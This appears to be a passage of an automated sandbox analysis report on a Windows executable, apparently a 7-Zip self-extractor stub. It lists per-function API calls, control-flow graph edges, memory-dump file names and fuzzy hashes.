                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004044A7
                                                                                                                                                                                                                                                  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                                                                                                                                                                • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                                                                                                                                • String ID: 7zSfxFolder%02d$IA
                                                                                                                                                                                                                                                • API String ID: 3387708999-1317665167
                                                                                                                                                                                                                                                • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                                                                                                                                                • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
                                                                                                                                                                                                                                                Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                                                                • String ID: IA$IA
                                                                                                                                                                                                                                                • API String ID: 1033339047-1400641299
                                                                                                                                                                                                                                                • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                                                                                                                                                                                                                                • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44
                                                                                                                                                                                                                                                Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                • String ID: $KA$4KA$HKA$\KA
                                                                                                                                                                                                                                                • API String ID: 1294909896-3316857779
                                                                                                                                                                                                                                                • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                                                                                                                                                                • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C
                                                                                                                                                                                                                                                Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004096D0
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                                                                                                                                                                                  • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@$H_prolog
                                                                                                                                                                                                                                                • String ID: HIA
                                                                                                                                                                                                                                                • API String ID: 3431946709-2712174624
                                                                                                                                                                                                                                                • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                                                                                                                                                                                                                                • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54
                                                                                                                                                                                                                                                Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                                                                                                                                                                • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlenmemcmp$memmove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251180759-0
                                                                                                                                                                                                                                                • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                                                                                                                                                                • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55
                                                                                                                                                                                                                                                Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                                                                                                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 359084233-0
                                                                                                                                                                                                                                                • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                                                                                                                                                                • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E
                                                                                                                                                                                                                                                Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
